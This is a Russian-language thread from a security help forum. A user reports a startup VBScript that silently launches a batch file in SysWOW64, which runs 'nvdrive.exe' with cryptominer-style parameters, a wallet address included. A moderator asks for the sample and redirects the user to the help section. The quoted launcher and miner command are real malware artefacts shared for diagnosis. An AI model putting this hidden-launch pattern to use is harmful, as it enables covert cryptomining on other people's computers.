Показано с 1 по 2 из 2.

SysWOW64

  1. #1
    Junior Member Репутация
    Регистрация
    01.03.2012
    Сообщений
    15
    Вес репутации
    22

    SysWOW64

    Здравствуйте.
    Не очень давно обращался к вам на форум в раздел "Помогите" с биткоин майнером, проблема решилась хорошо, пока никаких последствий или новых "лаж" не обнаружено, но возникло вот что.

    Включил сегодня компьютер, и, пока он загружался (хотя он и загружается за 10-15сек), пошел наливать чай. Пришел и увидел, что открыт какой-то файл блокнота с названием start. Так как компьютером пользуюсь практически я один и без моего ведома никто ничего здесь не делает, понял, что это "не мой файл". Проанализировал содержание этого файла и нашел знакомые буквы "SysWOW64". Знакомые они потому, что некоторые подозрительные файлы при убиении майнера находились в этой папке. Знаю, что она системная, но...

    В общем, вот текст блокнота открытого:
    Set oShell = Wscript.CreateObject("WScript.Shell")
    CommandLine = "%COMSPEC% /c c:\Windows\SysWOW64\Start.bat"
    oShell.Run CommandLine, 0, 0

    bat'ник, окей. Пошел в директорию и нашел там не только батник, но и vbs файл с таким же названием. скопировал последний, сменил vbs на txt (забыл как называется, расширение..?), открыл.

    Внутри был такой текст:
    c:\Windows\SysWOW64\nvdrive.exe -dbg -1 -lowcpu 2 -u 49ZuQzYVYBr6yy6hPiHPYa5i7iJN9nJMvKBDZs5b4VSR7R5w8m wr3ssdbMupL1bpaXaEXHwvFsXvNjTAL4pCCWZhE2iaA9K -p x

    Хоть я и не особо шарю в "кодах", но вижу, что тут есть параметры запуска (не так ли?) nvdrive... а при чем здесь CPU?

    В общем суть вопроса. Все здесь хорошо и файл открылся случайно (не верю особо в случайности) или обращаться в "Помогите"?
    Заранее спасибо.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Global Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Никита Соловьев
    Регистрация
    15.02.2009
    Сообщений
    13,143
    Вес репутации
    929
    Отправьте файл
    Цитата Сообщение от Vintorez174 Посмотреть сообщение
    c:\Windows\SysWOW64\nvdrive.exe
    согласно инструкции http://virusinfo.info/showthread.php?t=37678

    Рекомендую повторно обратиться в раздел помощи.

Похожие темы

  1. Ответов: 11
    Последнее сообщение: 21.01.2015, 19:54
  2. Подозрительная папка SysWOW64
    От julettad в разделе Помогите!
    Ответов: 2
    Последнее сообщение: 30.10.2014, 11:34
  3. svchost.exe в папке SysWOW64
    От Eugenia Ve в разделе Помогите!
    Ответов: 5
    Последнее сообщение: 02.02.2014, 01:17
  4. Ответов: 2
    Последнее сообщение: 11.10.2012, 00:22
  5. Win 2k3 x64 подмена system32 на sysWOW64
    От PFC в разделе Помогите!
    Ответов: 1
    Последнее сообщение: 09.06.2008, 13:07

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01526 seconds with 16 queries